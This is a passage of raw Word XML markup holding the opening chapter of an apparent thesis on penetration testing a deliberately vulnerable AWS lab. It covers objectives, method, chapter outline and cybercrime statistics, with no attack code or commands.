          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The existing literature on penetration testing covers both theoretical frameworks and practical methodologies, including the OWASP (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
        </w:rPr>
        <w:t>Open Worldwide Application Security Project</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>) Top 10, CVE (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>) databases, and CVSS (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
        </w:rPr>
        <w:t>Common Vulnerability Scoring System</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>) scoring. This thesis builds upon these foundations by applying them in a controlled, simulated environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F94380A" w14:textId="77777777" w:rsidR="000C5658" w:rsidRPr="000C5658" w:rsidRDefault="000C5658" w:rsidP="00851710">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The primary objective of this thesis is to simulate real-world cyberattacks by deploying a deliberately vulnerable cloud infrastructure on AWS (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
        </w:rPr>
        <w:t>Amazon Web Services</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>), performing penetration testing against it, and documenting all findings in a professional penetration testing report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5436C913" w14:textId="77777777" w:rsidR="000C5658" w:rsidRPr="000C5658" w:rsidRDefault="000C5658" w:rsidP="00851710">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The source materials used in this work include publicly available CVE databases, OWASP documentation, AWS technical documentation, academic publications on penetration testing methodologies, and real-world cybersecurity incident reports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CCCEE5" w14:textId="77777777" w:rsidR="000C5658" w:rsidRPr="000C5658" w:rsidRDefault="000C5658" w:rsidP="00851710">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The working method consists of three main phases: environment configuration, penetration testing execution, and report documentation. First, a cloud-based lab environment was designed and deployed on AWS, incorporating intentional misconfigurations and vulnerabilities. Second, penetration testing was performed against this environment using industry-standard tools and techniques. Finally, all findings were documented in a structured penetration testing report following professional standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB89D5E" w14:textId="04C03A08" w:rsidR="000C5658" w:rsidRPr="000C5658" w:rsidRDefault="000C5658" w:rsidP="00851710">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The thesis is structured as follows. Chapter 2 provides theoretical background on AWS and cloud computing concepts. Chapter 3 covers penetration testing theory, including methodologies, tools, and key concepts. Chapter 4 describes the configuration of the test environment. Chapter 5 presents the penetration testing methodology and detailed attack scenarios. Chapter 6 contains the full penetration testing report. Chapter 7 summarizes the findings and presents final conclusions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C9650D" w14:textId="539A1F61" w:rsidR="00B013D2" w:rsidRPr="00D77DFE" w:rsidRDefault="00851710" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidR="006551D6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00AB66CD" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0398A295" w14:textId="63A04480" w:rsidR="00A158D1" w:rsidRPr="00D77DFE" w:rsidRDefault="00A003DF" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc223521075"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00B013D2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Background and Related Work</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="35240253" w14:textId="739EA8C8" w:rsidR="002438AC" w:rsidRPr="00D77DFE" w:rsidRDefault="002438AC" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">How does the cybersecurity look in our era, and how it effects </w:t>
      </w:r>
      <w:r w:rsidR="00AC583C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>business?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2817B5A1" w14:textId="40F0482A" w:rsidR="004A256D" w:rsidRPr="00D77DFE" w:rsidRDefault="004A256D" w:rsidP="003A1361">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">In the first half of 2025, over 1,700 confirmed data breaches affected millions of individuals, with more than 165 million victim notifications issued. The global cost of cybercrime is estimated at $10.5 trillion, </w:t>
      </w:r>
      <w:r w:rsidR="002438AC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">growing </w:t>
      </w:r>
      <w:r w:rsidR="002438AC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">range </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>at 12.7% annually. Different countries and sectors experienced varied impacts, for example, in the UK, 50% of businesses reported experiencing a cyberattack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189ED0B2" w14:textId="2208D599" w:rsidR="004A256D" w:rsidRPr="00D77DFE" w:rsidRDefault="004A256D" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">In response, companies increasingly adopt penetration testing to identify vulnerabilities before real attacks occur. Studies indicate that 94% of firms consider penetration testing essential to their security programs. </w:t>
      </w:r>
      <w:r w:rsidR="00E06DF8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">68% of organizations </w:t>
      </w:r>
      <w:r w:rsidR="00E06DF8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> web application penetration testing. The cost of web application penetration testing typically ranges between $4.5k and $15k, while network infrastructure testing ranges from $6k to $20k.</w:t>
      </w:r>
      <w:r w:rsidR="006E396A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="paragraph1"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource1"</w:instrText>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006E396A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C672129" w14:textId="5F5A6425" w:rsidR="00B013D2" w:rsidRPr="00D77DFE" w:rsidRDefault="00A003DF" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc223521076"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00B013D2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem Statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="00B013D2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04498FFA" w14:textId="77777777" w:rsidR="002438AC" w:rsidRPr="00D77DFE" w:rsidRDefault="002438AC" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As mentioned in Section 1.1, many companies have been compromised due to misconfigurations, outdated services, weak passwords, and other vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B05C8" w14:textId="1703D70C" w:rsidR="002438AC" w:rsidRPr="00D77DFE" w:rsidRDefault="002438AC" w:rsidP="00420160">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In April 2025, attackers exploited a vulnerable web application in SAP NetWeaver Visual Composer, which allowed them to upload malicious files and gain full access control over the system. </w:t>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="paragraph2"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource2"</w:instrText>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00272961" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="644BD5CC" w14:textId="2F93A951" w:rsidR="0025361B" w:rsidRPr="00D77DFE" w:rsidRDefault="002438AC" w:rsidP="00420160">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A major concern is that many companies and organizations continue to operate with misconfigurations and unpatched software without realizing the risks, reflecting a general lack of security awareness.</w:t>
      </w:r>
      <w:r w:rsidR="00272961" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91555E" w14:textId="316F7F56" w:rsidR="00B013D2" w:rsidRPr="00D77DFE" w:rsidRDefault="00A003DF" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc223521077"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidR="00AD4C55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Project Objectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="626D10C0" w14:textId="769B9FFC" w:rsidR="00F5249D" w:rsidRPr="00D77DFE" w:rsidRDefault="00F5249D" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The main goal of this project is to simulate various cyberattacks that continue to occur today, demonstrating their causes, consequences, and recommendations to prevent them. It also involves performing web application and network infrastructure penetration testing, with a report documenting all activities from the penetration tester’s perspective. The project aims to investigate recent cyberattacks, using proof-of-concept demonstrations to verify the existence of vulnerabilities, as well as providing clear steps to reproduce each vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75265EB3" w14:textId="09073F18" w:rsidR="002040C2" w:rsidRPr="00D77DFE" w:rsidRDefault="00A003DF" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc223521078"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.4 </w:t>
      </w:r>
      <w:r w:rsidR="00F5249D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solving Problem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidR="00F5249D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D14B7A" w14:textId="3B77EBFF" w:rsidR="002040C2" w:rsidRPr="00D77DFE" w:rsidRDefault="002040C2" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To implement scenario that simulates cyber-attacks, a cloud‑based environment was deployed on AWS</w:t>
      </w:r>
      <w:r w:rsidR="00085AC3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Amazon Web </w:t>
      </w:r>
      <w:r w:rsidR="009A1AAA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Services)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, including the configuration of VPCs</w:t>
      </w:r>
      <w:r w:rsidR="004F5AE9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="004F5AE9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
